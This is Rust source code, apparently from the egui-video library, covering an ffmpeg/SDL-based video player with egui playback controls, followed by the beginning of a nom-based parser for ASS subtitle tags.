    let has_hours = dt.format("%H").to_string().parse::<i64>().unwrap() > 0;
    let pattern = if has_hours { "%H:%M:%S" } else { "%M:%S" };
    dt.format(pattern).to_string()
}
/// The playback device. Needs to be initialized (and kept alive!) for use by a [`Player`].
pub struct AudioDevice(pub(crate) audio::AudioDevice<AudioDeviceCallback>);
impl AudioDevice {
    /// Create a new [`AudioDevice`] from an existing [`sdl2::AudioSubsystem`]. An [`AudioDevice`] is required for using audio.
    pub fn from_subsystem(audio_sys: &sdl2::AudioSubsystem) -> Result<AudioDevice, String> {
        // 44.1 kHz stereo; `samples: None` lets SDL pick a buffer size.
        let audio_spec = AudioSpecDesired {
            freq: Some(44_100),
            channels: Some(2),
            samples: None,
        };
        // Playback opens with no attached sample streams; streams are added later.
        let device = audio_sys.open_playback(None, &audio_spec, |_spec| AudioDeviceCallback {
            sample_streams: vec![],
        })?;
        Ok(AudioDevice(device))
    }
    /// Create a new [`AudioDevice`]. Creates an [`sdl2::AudioSubsystem`]. An [`AudioDevice`] is required for using audio.
    pub fn new() -> Result<AudioDevice, String> {
        // without setting this hint, SDL captures SIGINT (Ctrl+C) and because we are not handling SDL events
        // this prevents the application from closing
        sdl2::hint::set("SDL_NO_SIGNAL_HANDLERS", "1");
        Self::from_subsystem(&sdl2::init()?.audio()?)
    }
}
/// Internal notifications sent from streamer threads back to the [`Player`].
enum PlayerMessage {
    /// A stream of the given media type was cycled to the file's next stream.
    StreamCycled(Type),
}
type PlayerMessageSender = std::sync::mpsc::Sender<PlayerMessage>;
type PlayerMessageReciever = std::sync::mpsc::Receiver<PlayerMessage>;
// Callback used to hand a decoded video frame to the UI texture.
type ApplyVideoFrameFn = Box<dyn FnMut(ColorImage) + Send>;
type SubtitleQueue = Arc<Mutex<VecDeque<Subtitle>>>;
// SPSC ring-buffer halves used to ship decoded audio samples to the device.
type RingbufProducer<T> = Caching<Arc<HeapRb<T>>, true, false>;
type RingbufConsumer<T> = Caching<Arc<HeapRb<T>>, false, true>;
type AudioSampleProducer = RingbufProducer<f32>;
type AudioSampleConsumer = RingbufConsumer<f32>;
/// Configurable aspects of a [`Player`].
#[derive(Clone, Debug)]
pub struct PlayerOptions {
    /// Should the stream loop if it finishes?
    pub looping: bool,
    /// The volume of the audio stream.
    /// Expected to stay within `0.0..=max_audio_volume`; prefer
    /// [`PlayerOptions::set_audio_volume`], which clamps it.
    pub audio_volume: Shared<f32>,
    /// The maximum volume of the audio stream.
    pub max_audio_volume: f32,
    /// The texture options for the displayed video frame.
    pub texture_options: TextureOptions,
}
impl Default for PlayerOptions {
fn default() -> Self {
Self {
looping: true,
max_audio_volume: 1.,
audio_volume: Shared::new(0.5),
texture_options: TextureOptions::default(),
}
}
}
impl PlayerOptions {
    /// Set the maximum player volume, and scale the actual player volume to
    /// keep the same current ratio.
    pub fn set_max_audio_volume(&mut self, volume: f32) {
        let ratio = volume / self.max_audio_volume;
        let rescaled_volume = self.audio_volume.get() * ratio;
        self.audio_volume.set(rescaled_volume);
        self.max_audio_volume = volume;
    }
    /// Set the player volume, clamped in `0.0..=max_audio_volume`.
    pub fn set_audio_volume(&mut self, volume: f32) {
        let clamped = volume.clamp(0., self.max_audio_volume);
        self.audio_volume.set(clamped);
    }
}
/// The [`Player`] processes and controls streams of video/audio. This is what you use to show a video file.
/// Initialize once, and use the [`Player::ui`] or [`Player::ui_at()`] functions to show the playback.
pub struct Player {
    /// The video streamer of the player.
    pub video_streamer: Arc<Mutex<VideoStreamer>>,
    /// The audio streamer of the player. Won't exist unless [`Player::with_audio`] is called and there exists
    /// a valid audio stream in the file.
    pub audio_streamer: Option<Arc<Mutex<AudioStreamer>>>,
    /// The subtitle streamer of the player. Won't exist unless [`Player::with_subtitles`] is called and there exists
    /// a valid subtitle stream in the file.
    pub subtitle_streamer: Option<Arc<Mutex<SubtitleStreamer>>>,
    /// The state of the player.
    pub player_state: Shared<PlayerState>,
    /// The player's texture handle.
    pub texture_handle: TextureHandle,
    /// The size of the video stream.
    pub size: Vec2,
    /// The total duration of the stream, in milliseconds.
    pub duration_ms: i64,
    /// The framerate of the video stream, in frames per second.
    pub framerate: f64,
    /// Configures certain aspects of this [`Player`].
    pub options: PlayerOptions,
    // Bookkeeping for cycling between the file's audio/subtitle streams.
    audio_stream_info: StreamInfo,
    subtitle_stream_info: StreamInfo,
    // Channel used by streamer threads to notify the player (e.g. StreamCycled).
    message_sender: PlayerMessageSender,
    message_reciever: PlayerMessageReciever,
    // Timers that periodically drive the decode loops of each streamer.
    video_timer: Timer,
    audio_timer: Timer,
    subtitle_timer: Timer,
    // Guards for the scheduled decode callbacks (dropping a guard cancels it —
    // timer crate semantics).
    audio_thread: Option<Guard>,
    video_thread: Option<Guard>,
    subtitle_thread: Option<Guard>,
    ctx_ref: egui::Context,
    // Target position of an in-progress seek, in milliseconds.
    last_seek_ms: Option<i64>,
    // State to restore once seeking finishes.
    preseek_player_state: Option<PlayerState>,
    // Keeps the temp file alive when the player was created from raw bytes.
    #[cfg(feature = "from_bytes")]
    temp_file: Option<NamedTempFile>,
    // Elapsed-time counters shared with the streamer threads.
    video_elapsed_ms: Shared<i64>,
    audio_elapsed_ms: Shared<i64>,
    subtitle_elapsed_ms: Shared<i64>,
    // Display-only override of the elapsed time while seeking.
    video_elapsed_ms_override: Option<i64>,
    // Decoded subtitles waiting to be shown / currently on screen.
    subtitles_queue: SubtitleQueue,
    current_subtitles: Vec<Subtitle>,
    input_path: String,
}
/// The possible states of a [`Player`].
// `NoUninit` + `repr(u8)` let the state be stored atomically inside [`Shared`].
#[derive(PartialEq, Clone, Copy, Debug, NoUninit)]
#[repr(u8)]
pub enum PlayerState {
    /// No playback.
    Stopped,
    /// Streams have reached the end of the file.
    EndOfFile,
    /// Stream is seeking.
    SeekingInProgress,
    /// Stream has finished seeking.
    SeekingFinished,
    /// Playback is paused.
    Paused,
    /// Playback is ongoing.
    Playing,
    /// Playback is scheduled to restart.
    Restarting,
}
/// Streams video.
pub struct VideoStreamer {
    video_decoder: ffmpeg::decoder::Video,
    video_stream_index: StreamIndex,
    // Shared with the Player; drives the decode loop.
    player_state: Shared<PlayerState>,
    duration_ms: i64,
    input_context: Input,
    video_elapsed_ms: Shared<i64>,
    _audio_elapsed_ms: Shared<i64>,
    // Callback that uploads a decoded frame to the UI texture.
    apply_video_frame_fn: Option<ApplyVideoFrameFn>,
}
/// Streams audio.
pub struct AudioStreamer {
    video_elapsed_ms: Shared<i64>,
    audio_elapsed_ms: Shared<i64>,
    duration_ms: i64,
    audio_decoder: ffmpeg::decoder::Audio,
    // Converts decoded audio into the device's sample format/rate.
    resampler: software::resampling::Context,
    // Producer half of the ring buffer consumed by the audio device callback.
    audio_sample_producer: AudioSampleProducer,
    input_context: Input,
    player_state: Shared<PlayerState>,
    // All audio streams of the file; front is the active one (cycling rotates).
    audio_stream_indices: VecDeque<StreamIndex>,
}
/// Streams subtitles.
pub struct SubtitleStreamer {
    video_elapsed_ms: Shared<i64>,
    _audio_elapsed_ms: Shared<i64>,
    subtitle_elapsed_ms: Shared<i64>,
    duration_ms: i64,
    subtitle_decoder: ffmpeg::decoder::Subtitle,
    next_packet: Option<Packet>,
    // Decoded subtitles handed over to the Player for display.
    subtitles_queue: SubtitleQueue,
    input_context: Input,
    player_state: Shared<PlayerState>,
    // All subtitle streams of the file; front is the active one.
    subtitle_stream_indices: VecDeque<StreamIndex>,
}
#[derive(Clone, Debug)]
/// Simple concurrency wrapper for primitive values.
pub struct Shared<T: Copy + bytemuck::NoUninit> {
    // Clones share the same underlying atomic cell.
    raw_value: Arc<Atomic<T>>,
}
impl<T: Copy + bytemuck::NoUninit> Shared<T> {
    /// Set the value.
    pub fn set(&self, value: T) {
        // Relaxed ordering: only atomicity of the single value is needed here;
        // NOTE(review): confirm no reader relies on ordering with other writes.
        self.raw_value.store(value, atomic::Ordering::Relaxed)
    }
    /// Get the value.
    pub fn get(&self) -> T {
        self.raw_value.load(atomic::Ordering::Relaxed)
    }
    /// Make a new cache.
    pub fn new(value: T) -> Self {
        Self {
            raw_value: Arc::new(Atomic::new(value)),
        }
    }
}
// ffmpeg's global time base (1 / AV_TIME_BASE seconds per tick).
const AV_TIME_BASE_RATIONAL: Rational = Rational(1, AV_TIME_BASE);
// Millisecond time base used for all user-facing positions.
const MILLISEC_TIME_BASE: Rational = Rational(1, 1000);
/// Converts a stream timestamp expressed in `time_base` units to milliseconds.
fn timestamp_to_millisec(timestamp: i64, time_base: Rational) -> i64 {
    timestamp.rescale(time_base, MILLISEC_TIME_BASE)
}
/// Converts milliseconds to a stream timestamp in `time_base` units.
fn millisec_to_timestamp(millisec: i64, time_base: Rational) -> i64 {
    millisec.rescale(MILLISEC_TIME_BASE, time_base)
}
/// Two millisecond timestamps are "equal enough" when they differ by less
/// than 50 ms (`abs_diff` avoids overflow on extreme values).
#[inline(always)]
fn millisec_approx_eq(a: i64, b: i64) -> bool {
    const TOLERANCE_MS: u64 = 50;
    a.abs_diff(b) < TOLERANCE_MS
}
impl Player {
/// A formatted string for displaying the duration of the video stream.
pub fn duration_text(&mut self) -> String {
format!(
"{} / {}",
format_duration(Duration::milliseconds(self.elapsed_ms())),
format_duration(Duration::milliseconds(self.duration_ms))
)
}
    /// Clears seek/elapsed bookkeeping and rewinds the video (and audio, if
    /// present) streamers back to the start of the file.
    fn reset(&mut self) {
        self.last_seek_ms = None;
        self.video_elapsed_ms_override = None;
        self.video_elapsed_ms.set(0);
        self.audio_elapsed_ms.set(0);
        self.video_streamer.lock().reset();
        if let Some(audio_decoder) = self.audio_streamer.as_mut() {
            audio_decoder.lock().reset();
        }
    }
/// The elapsed duration of the stream, in milliseconds. This value will won't be truly accurate to the decoders
/// while seeking, and will instead be overridden with the target seek location (for visual representation purposes).
pub fn elapsed_ms(&self) -> i64 {
self.video_elapsed_ms_override
.as_ref()
.map(|i| *i)
.unwrap_or(self.video_elapsed_ms.get())
}
    /// Store a new state in the shared `player_state` flag (read by the
    /// streamer threads).
    fn set_state(&mut self, new_state: PlayerState) {
        self.player_state.set(new_state)
    }
    /// Pause the stream.
    pub fn pause(&mut self) {
        self.set_state(PlayerState::Paused)
    }
    /// Resume the stream from a paused state.
    pub fn resume(&mut self) {
        self.set_state(PlayerState::Playing)
    }
    /// Stop the stream.
    pub fn stop(&mut self) {
        self.set_state(PlayerState::Stopped);
        // Dropping the timer guards cancels the scheduled decode callbacks.
        self.video_thread = None;
        self.audio_thread = None;
        self.reset()
    }
    /// Fraction (0..=1) of the stream that has elapsed.
    fn duration_frac(&mut self) -> f32 {
        self.elapsed_ms() as f32 / self.duration_ms as f32
    }
    /// Seek to a location in the stream.
    ///
    /// `seek_frac` is a fraction (0..=1) of the total duration. Each streamer
    /// seeks on its own background thread so the UI never blocks; the player
    /// stays in `SeekingInProgress` until seeking completes, then returns to
    /// the remembered pre-seek state (see `process_state`).
    pub fn seek(&mut self, seek_frac: f32) {
        let current_state = self.player_state.get();
        if !matches!(current_state, PlayerState::SeekingInProgress) {
            // Remember which state to restore once the seek finishes.
            match current_state {
                PlayerState::Stopped | PlayerState::EndOfFile => {
                    self.preseek_player_state = Some(PlayerState::Paused);
                    self.start();
                }
                PlayerState::Paused | PlayerState::Playing => {
                    self.preseek_player_state = Some(current_state);
                }
                _ => (),
            }
            let video_streamer = self.video_streamer.clone();
            let mut audio_streamer = self.audio_streamer.clone();
            let mut subtitle_streamer = self.subtitle_streamer.clone();
            let subtitle_queue = self.subtitles_queue.clone();
            self.last_seek_ms = Some((seek_frac as f64 * self.duration_ms as f64) as i64);
            self.set_state(PlayerState::SeekingInProgress);
            if let Some(audio_streamer) = audio_streamer.take() {
                std::thread::spawn(move || {
                    audio_streamer.lock().seek(seek_frac);
                });
            };
            if let Some(subtitle_streamer) = subtitle_streamer.take() {
                // Subtitles currently on screen are stale after a seek.
                self.current_subtitles.clear();
                std::thread::spawn(move || {
                    subtitle_queue.lock().clear();
                    subtitle_streamer.lock().seek(seek_frac);
                });
            };
            std::thread::spawn(move || {
                video_streamer.lock().seek(seek_frac);
            });
        }
    }
    /// Schedules the repeating decode callbacks: video at the stream
    /// framerate, audio as fast as possible, subtitles at the framerate.
    /// The returned guards are stored so `stop` can cancel them by dropping.
    fn spawn_timers(&mut self) {
        let mut texture_handle = self.texture_handle.clone();
        let texture_options = self.options.texture_options;
        let ctx = self.ctx_ref.clone();
        // One video frame per timer tick.
        let wait_duration = Duration::milliseconds((1000. / self.framerate) as i64);
        // Shared decode step: advance the streamer only while playing and only
        // when the primary (video) clock has caught up with this stream.
        fn play<T: Streamer>(streamer: &Weak<Mutex<T>>) {
            if let Some(streamer) = streamer.upgrade() {
                // `try_lock` so a busy streamer (e.g. seeking) is skipped, not blocked on.
                if let Some(mut streamer) = streamer.try_lock() {
                    if (streamer.player_state().get() == PlayerState::Playing)
                        && streamer.primary_elapsed_ms().get() >= streamer.elapsed_ms().get()
                    {
                        match streamer.recieve_next_packet_until_frame() {
                            Ok(frame) => streamer.apply_frame(frame),
                            Err(e) => {
                                // Only the primary streamer flips the player to EOF.
                                if is_ffmpeg_eof_error(&e) && streamer.is_primary_streamer() {
                                    streamer.player_state().set(PlayerState::EndOfFile)
                                }
                            }
                        }
                    }
                }
            }
        }
        // Decoded video frames are written straight into the UI texture.
        self.video_streamer.lock().apply_video_frame_fn = Some(Box::new(move |frame| {
            texture_handle.set(frame, texture_options)
        }));
        let video_streamer_ref = Arc::downgrade(&self.video_streamer);
        let video_timer_guard = self.video_timer.schedule_repeating(wait_duration, move || {
            play(&video_streamer_ref);
            ctx.request_repaint();
        });
        self.video_thread = Some(video_timer_guard);
        if let Some(audio_decoder) = self.audio_streamer.as_ref() {
            let audio_decoder_ref = Arc::downgrade(audio_decoder);
            let audio_timer_guard = self
                .audio_timer
                .schedule_repeating(Duration::zero(), move || play(&audio_decoder_ref));
            self.audio_thread = Some(audio_timer_guard);
        }
        if let Some(subtitle_decoder) = self.subtitle_streamer.as_ref() {
            let subtitle_decoder_ref = Arc::downgrade(subtitle_decoder);
            let subtitle_timer_guard = self
                .subtitle_timer
                .schedule_repeating(wait_duration, move || play(&subtitle_decoder_ref));
            self.subtitle_thread = Some(subtitle_timer_guard);
        }
    }
    /// Start the stream.
    pub fn start(&mut self) {
        // Cancel any previous timers and rewind before scheduling fresh ones.
        self.stop();
        self.spawn_timers();
        self.resume();
    }
    /// Process player state updates. This function must be called for proper function
    /// of the player. This function is already included in [`Player::ui`] or
    /// [`Player::ui_at`].
    pub fn process_state(&mut self) {
        let mut reset_stream = false;
        match self.player_state.get() {
            PlayerState::EndOfFile => {
                // Either loop back to the start or come to a rest.
                if self.options.looping {
                    reset_stream = true;
                } else {
                    self.player_state.set(PlayerState::Stopped);
                }
            }
            PlayerState::Playing => {
                // Age the on-screen subtitles by the UI frame time and drop expired ones.
                for subtitle in self.current_subtitles.iter_mut() {
                    subtitle.remaining_duration_ms -=
                        self.ctx_ref.input(|i| (i.stable_dt * 1000.) as i64);
                }
                self.current_subtitles
                    .retain(|s| s.remaining_duration_ms > 0);
                if let Some(mut queue) = self.subtitles_queue.try_lock() {
                    if queue.len() > 1 {
                        self.current_subtitles.push(queue.pop_front().unwrap());
                    }
                }
            }
            state @ (PlayerState::SeekingInProgress | PlayerState::SeekingFinished) => {
                if self.last_seek_ms.is_some() {
                    let last_seek_ms = *self.last_seek_ms.as_ref().unwrap();
                    if matches!(state, PlayerState::SeekingFinished) {
                        // Restore whatever state the player was in before the seek.
                        if let Some(previeous_player_state) = self.preseek_player_state {
                            self.set_state(previeous_player_state)
                        }
                        self.video_elapsed_ms_override = None;
                        self.last_seek_ms = None;
                    } else {
                        // While seeking, show the seek target instead of the decoder clock.
                        self.video_elapsed_ms_override = Some(last_seek_ms);
                    }
                } else {
                    self.video_elapsed_ms_override = None;
                }
            }
            PlayerState::Restarting => reset_stream = true,
            _ => (),
        }
        // Handle notifications coming from the streamer threads.
        if let Ok(message) = self.message_reciever.try_recv() {
            match message {
                PlayerMessage::StreamCycled(stream_type) => match stream_type {
                    Type::Audio => self.audio_stream_info.cycle(),
                    Type::Subtitle => {
                        self.current_subtitles.clear();
                        self.subtitle_stream_info.cycle();
                    }
                    _ => unreachable!(),
                },
            }
        }
        if reset_stream {
            self.reset();
            self.resume();
        }
    }
    /// Create the [`egui::Image`] for the video frame.
    pub fn generate_frame_image(&self, size: Vec2) -> Image {
        Image::new(SizedTexture::new(self.texture_handle.id(), size)).sense(Sense::click())
    }
    /// Draw the video frame with a specific rect (without controls). Make sure to call [`Player::process_state`].
    pub fn render_frame(&self, ui: &mut Ui, size: Vec2) -> Response {
        ui.add(self.generate_frame_image(size))
    }
    /// Draw the video frame (without controls). Make sure to call [`Player::process_state`].
    pub fn render_frame_at(&self, ui: &mut Ui, rect: Rect) -> Response {
        ui.put(rect, self.generate_frame_image(rect.size()))
    }
/// Draw the video frame and player controls and process state changes.
pub fn ui(&mut self, ui: &mut Ui, size: Vec2) -> egui::Response {
let frame_response = self.render_frame(ui, size);
self.render_controls(ui, &frame_response);
self.render_subtitles(ui, &frame_response);
self.process_state();
frame_response
}
/// Draw the video frame and player controls with a specific rect, and process state changes.
pub fn ui_at(&mut self, ui: &mut Ui, rect: Rect) -> egui::Response {
let frame_response = self.render_frame_at(ui, rect);
self.render_controls(ui, &frame_response);
self.render_subtitles(ui, &frame_response);
self.process_state();
frame_response
}
    /// Draw the subtitles, if any. Only works when a subtitle streamer has been already created with
    /// [`Player::add_subtitles`] or [`Player::with_subtitles`] and a valid subtitle stream exists.
    pub fn render_subtitles(&mut self, ui: &mut Ui, frame_response: &Response) {
        // Default anchor for auto-placed subtitles, in native video coordinates.
        let original_rect_center_bottom = Pos2::new(self.size.x / 2., self.size.y);
        // Bottom edge still available to the next stacked subtitle (native coords).
        let mut last_bottom = self.size.y;
        for subtitle in self.current_subtitles.iter() {
            // Maps native video coordinates onto the on-screen frame rect.
            let transform = RectTransform::from_to(
                Rect::from_min_size(Pos2::ZERO, self.size),
                frame_response.rect,
            );
            let text_rect = ui.painter().text(
                // Use the explicit `\pos` position when present; otherwise stack
                // this subtitle above the previous one at bottom-center.
                subtitle
                    .position
                    .map(|p| transform.transform_pos(p))
                    .unwrap_or_else(|| {
                        //TODO incorporate left/right margin
                        let mut center_bottom = original_rect_center_bottom;
                        center_bottom.y = center_bottom.y.min(last_bottom) - subtitle.margin.bottom;
                        transform.transform_pos(center_bottom)
                    }),
                subtitle.alignment,
                &subtitle.text,
                // NOTE(review): `transform_pos` includes the frame rect's origin
                // offset, so the resulting font size also grows with the rect's
                // left edge; a pure scale factor may be intended — verify.
                FontId::proportional(transform.transform_pos(Pos2::new(subtitle.font_size, 0.)).x),
                subtitle.primary_fill,
            );
            // Record this subtitle's top (back in native coords) so the next
            // subtitle stacks above it.
            last_bottom = transform.inverse().transform_pos(text_rect.center_top()).y;
        }
    }
/// Draw the player controls. Make sure to call [`Player::process_state()`]. Unless you are explicitly
/// drawing something in between the video frames and controls, it is probably better to use
/// [`Player::ui`] or [`Player::ui_at`].
pub fn render_controls(&mut self, ui: &mut Ui, frame_response: &Response) {
let hovered = ui.rect_contains_pointer(frame_response.rect);
let player_state = self.player_state.get();
let currently_seeking = matches!(
player_state,
PlayerState::SeekingInProgress | PlayerState::SeekingFinished
);
let is_stopped = matches!(player_state, PlayerState::Stopped);
let is_paused = matches!(player_state, PlayerState::Paused);
let animation_time = 0.2;
let seekbar_anim_frac = ui.ctx().animate_bool_with_time(
frame_response.id.with("seekbar_anim"),
hovered || currently_seeking || is_paused || is_stopped,
animation_time,
);
if seekbar_anim_frac <= 0. {
return;
}
let seekbar_width_offset = 20.;
let fullseekbar_width = frame_response.rect.width() - seekbar_width_offset;
let seekbar_width = fullseekbar_width * self.duration_frac();
let seekbar_offset = 20.;
let seekbar_pos =
frame_response.rect.left_bottom() + vec2(seekbar_width_offset / 2., -seekbar_offset);
let seekbar_height = 3.;
let mut fullseekbar_rect =
Rect::from_min_size(seekbar_pos, vec2(fullseekbar_width, seekbar_height));
let mut seekbar_rect =
Rect::from_min_size(seekbar_pos, vec2(seekbar_width, seekbar_height));
let seekbar_interact_rect = fullseekbar_rect.expand(10.);
let seekbar_response = ui.interact(
seekbar_interact_rect,
frame_response.id.with("seekbar"),
Sense::click_and_drag(),
);
let seekbar_hovered = seekbar_response.hovered();
let seekbar_hover_anim_frac = ui.ctx().animate_bool_with_time(
frame_response.id.with("seekbar_hover_anim"),
seekbar_hovered || currently_seeking,
animation_time,
);
if seekbar_hover_anim_frac > 0. {
let new_top = fullseekbar_rect.top() - (3. * seekbar_hover_anim_frac);
fullseekbar_rect.set_top(new_top);
seekbar_rect.set_top(new_top);
}
let seek_indicator_anim = ui.ctx().animate_bool_with_time(
frame_response.id.with("seek_indicator_anim"),
currently_seeking,
animation_time,
);
if currently_seeking {
let seek_indicator_shadow = Shadow {
offset: vec2(10.0, 20.0),
blur: 15.0,
spread: 0.0,
color: Color32::from_black_alpha(96).linear_multiply(seek_indicator_anim),
};
let spinner_size = 20. * seek_indicator_anim;
ui.painter()
.add(seek_indicator_shadow.as_shape(frame_response.rect, Rounding::ZERO));
ui.put(
Rect::from_center_size(frame_response.rect.center(), Vec2::splat(spinner_size)),
Spinner::new().size(spinner_size),
);
}
if seekbar_hovered || currently_seeking {
if let Some(hover_pos) = seekbar_response.hover_pos() {
if seekbar_response.clicked() || seekbar_response.dragged() {
let seek_frac = ((hover_pos - frame_response.rect.left_top()).x
- seekbar_width_offset / 2.)
.max(0.)
.min(fullseekbar_width)
/ fullseekbar_width;
seekbar_rect.set_right(
hover_pos
.x
.min(fullseekbar_rect.right())
.max(fullseekbar_rect.left()),
);
if is_stopped {
self.start()
}
self.seek(seek_frac);
}
}
}
let text_color = Color32::WHITE.linear_multiply(seekbar_anim_frac);
let pause_icon = if is_paused {
"▶"
} else if is_stopped {
"◼"
} else if currently_seeking {
"↔"
} else {
"⏸"
};
let audio_volume_frac = self.options.audio_volume.get() / self.options.max_audio_volume;
let sound_icon = if audio_volume_frac > 0.7 {
"🔊"
} else if audio_volume_frac > 0.4 {
"🔉"
} else if audio_volume_frac > 0. {
"🔈"
} else {
"🔇"
};
let icon_font_id = FontId {
size: 16.,
..Default::default()
};
let subtitle_icon = "💬";
let stream_icon = "🔁";
let icon_margin = 5.;
let text_y_offset = -7.;
let sound_icon_offset = vec2(-5., text_y_offset);
let sound_icon_pos = fullseekbar_rect.right_top() + sound_icon_offset;
let stream_index_icon_offset = vec2(-30., text_y_offset + 1.);
let stream_icon_pos = fullseekbar_rect.right_top() + stream_index_icon_offset;
let contraster_alpha: u8 = 100;
let pause_icon_offset = vec2(3., text_y_offset);
let pause_icon_pos = fullseekbar_rect.left_top() + pause_icon_offset;
let duration_text_offset = vec2(25., text_y_offset);
let duration_text_pos = fullseekbar_rect.left_top() + duration_text_offset;
let duration_text_font_id = FontId {
size: 14.,
..Default::default()
};
let shadow = Shadow {
offset: vec2(10.0, 20.0),
blur: 15.0,
spread: 0.0,
color: Color32::from_black_alpha(25).linear_multiply(seekbar_anim_frac),
};
let mut shadow_rect = frame_response.rect;
shadow_rect.set_top(shadow_rect.bottom() - seekbar_offset - 10.);
let fullseekbar_color = Color32::GRAY.linear_multiply(seekbar_anim_frac);
let seekbar_color = Color32::WHITE.linear_multiply(seekbar_anim_frac);
ui.painter()
.add(shadow.as_shape(shadow_rect, Rounding::ZERO));
ui.painter().rect_filled(
fullseekbar_rect,
Rounding::ZERO,
fullseekbar_color.linear_multiply(0.5),
);
ui.painter()
.rect_filled(seekbar_rect, Rounding::ZERO, seekbar_color);
ui.painter().text(
pause_icon_pos,
Align2::LEFT_BOTTOM,
pause_icon,
icon_font_id.clone(),
text_color,
);
ui.painter().text(
duration_text_pos,
Align2::LEFT_BOTTOM,
self.duration_text(),
duration_text_font_id,
text_color,
);
if seekbar_hover_anim_frac > 0. {
ui.painter().circle_filled(
seekbar_rect.right_center(),
7. * seekbar_hover_anim_frac,
seekbar_color,
);
}
if frame_response.clicked() {
let mut reset_stream = false;
let mut start_stream = false;
match self.player_state.get() {
PlayerState::Stopped => start_stream = true,
PlayerState::EndOfFile => reset_stream = true,
PlayerState::Paused => self.player_state.set(PlayerState::Playing),
PlayerState::Playing => self.player_state.set(PlayerState::Paused),
_ => (),
}
if reset_stream {
self.reset();
self.resume();
} else if start_stream {
self.start();
}
}
let is_audio_cyclable = self.audio_stream_info.is_cyclable();
let is_subtitle_cyclable = self.audio_stream_info.is_cyclable();
if is_audio_cyclable || is_subtitle_cyclable {
let stream_icon_rect = ui.painter().text(
stream_icon_pos,
Align2::RIGHT_BOTTOM,
stream_icon,
icon_font_id.clone(),
text_color,
);
let stream_icon_hovered = ui.rect_contains_pointer(stream_icon_rect);
let mut stream_info_hovered = false;
let mut cursor = stream_icon_rect.right_top() + vec2(0., 5.);
let cursor_offset = vec2(3., 15.);
let stream_anim_id = frame_response.id.with("stream_anim");
let mut stream_anim_frac: f32 = ui
.ctx()
.memory_mut(|m| *m.data.get_temp_mut_or_default(stream_anim_id));
let mut draw_row = |stream_type: Type| {
let text = match stream_type {
Type::Audio => format!("{} {}", sound_icon, self.audio_stream_info),
Type::Subtitle => format!("{} {}", subtitle_icon, self.subtitle_stream_info),
_ => unreachable!(),
};
let text_position = cursor - cursor_offset;
let text_galley =
ui.painter()
.layout_no_wrap(text.clone(), icon_font_id.clone(), text_color);
let background_rect =
Rect::from_min_max(text_position - text_galley.size(), text_position)
.expand(5.);
let background_color =
Color32::from_black_alpha(contraster_alpha).linear_multiply(stream_anim_frac);
ui.painter()
.rect_filled(background_rect, Rounding::same(5.), background_color);
if ui.rect_contains_pointer(background_rect.expand(5.)) {
stream_info_hovered = true;
}
if ui
.interact(
background_rect,
frame_response.id.with(&text),
Sense::click(),
)
.clicked()
{
match stream_type {
Type::Audio => self.cycle_audio_stream(),
Type::Subtitle => self.cycle_subtitle_stream(),
_ => unreachable!(),
};
};
let text_rect = ui.painter().text(
text_position,
Align2::RIGHT_BOTTOM,
text,
icon_font_id.clone(),
text_color.linear_multiply(stream_anim_frac),
);
cursor.y = text_rect.top();
};
if stream_anim_frac > 0. {
if is_audio_cyclable {
draw_row(Type::Audio);
}
if is_subtitle_cyclable {
draw_row(Type::Subtitle);
}
}
stream_anim_frac = ui.ctx().animate_bool_with_time(
stream_anim_id,
stream_icon_hovered || (stream_info_hovered && stream_anim_frac > 0.),
animation_time,
);
ui.ctx()
.memory_mut(|m| m.data.insert_temp(stream_anim_id, stream_anim_frac));
}
if self.audio_streamer.is_some() {
let sound_icon_rect = ui.painter().text(
sound_icon_pos,
Align2::RIGHT_BOTTOM,
sound_icon,
icon_font_id.clone(),
text_color,
);
if ui
.interact(
sound_icon_rect,
| rust | MIT | 68933f42b45220af92221fb82315b03c87e7efce | 2026-01-04T20:23:24.044000Z | true |
n00kii/egui-video | https://github.com/n00kii/egui-video/blob/68933f42b45220af92221fb82315b03c87e7efce/src/subtitle/ass.rs | src/subtitle/ass.rs | use anyhow::{anyhow, bail, Context, Result};
use egui::{Align2, Color32, Pos2};
use nom::branch::alt;
use nom::bytes::complete::{is_not, tag, take_till, take_until, take_while_m_n};
use nom::character::complete::{char, digit0, digit1};
use nom::combinator::{map, map_res, opt, rest};
use nom::error::context;
use nom::multi::{many0, separated_list0};
use nom::number::complete::double;
use nom::sequence::{delimited, pair, preceded, tuple};
use nom::{AsChar, IResult};
use super::{FadeEffect, Subtitle, SubtitleField};
/// Parses a parenthesized, comma-separated list of numbers, e.g. `(12,34.5)`.
fn num_list(i: &str) -> IResult<&str, Vec<f64>> {
    delimited(char('('), separated_list0(char(','), double), char(')'))(i)
}
/// Takes the first two parsed numbers as an `(i64, i64)` pair, truncating any
/// fractional part; errors if fewer than two items were parsed.
fn tuple_int_2(v: Vec<f64>) -> Result<(i64, i64)> {
    tuple_float_2(v).map(|v| (v.0 as i64, v.1 as i64))
}
/// Takes the first two parsed numbers as an `(f64, f64)` pair; fails with a
/// context message when the list holds fewer than two items.
fn tuple_float_2(v: Vec<f64>) -> Result<(f64, f64)> {
    const FAIL_TEXT: &str = "invalid number of items";
    Ok((*v.first().context(FAIL_TEXT)?, *v.get(1).context(FAIL_TEXT)?))
}
/// Parses an ASS `\fad(<in_ms>,<out_ms>)` override tag into a fade effect.
fn fad(i: &str) -> IResult<&str, SubtitleField> {
    preceded(
        tag(r"\fad"),
        // Destructure the pair and build the field directly; the original
        // bound it to a temporary local only to return it on the next line.
        map(map_res(num_list, tuple_int_2), |(fade_in_ms, fade_out_ms)| {
            SubtitleField::Fade(FadeEffect {
                _fade_in_ms: fade_in_ms,
                _fade_out_ms: fade_out_ms,
            })
        }),
    )(i)
}
/// Recognizes an ASS `\t(...)` transform tag. Transitions are not implemented,
/// so the tag contents are consumed and reported as an undefined field.
fn t(i: &str) -> IResult<&str, SubtitleField> {
    preceded(
        tag(r"\t"),
        delimited(
            char('('),
            map(take_until(")"), |_| {
                SubtitleField::Undefined("transition not implemented")
            }),
            char(')'),
        ),
    )(i)
}
/// Parses an ASS `\an<1-9>` alignment tag, mapping the numpad-style digit
/// (1 = bottom-left … 9 = top-right) onto an egui [`Align2`].
fn an(i: &str) -> IResult<&str, SubtitleField> {
    preceded(
        tag(r"\an"),
        map_res(digit1, |s: &str| match s.parse::<i64>() {
            Ok(1) => Ok(SubtitleField::Alignment(Align2::LEFT_BOTTOM)),
            Ok(2) => Ok(SubtitleField::Alignment(Align2::CENTER_BOTTOM)),
            Ok(3) => Ok(SubtitleField::Alignment(Align2::RIGHT_BOTTOM)),
            Ok(4) => Ok(SubtitleField::Alignment(Align2::LEFT_CENTER)),
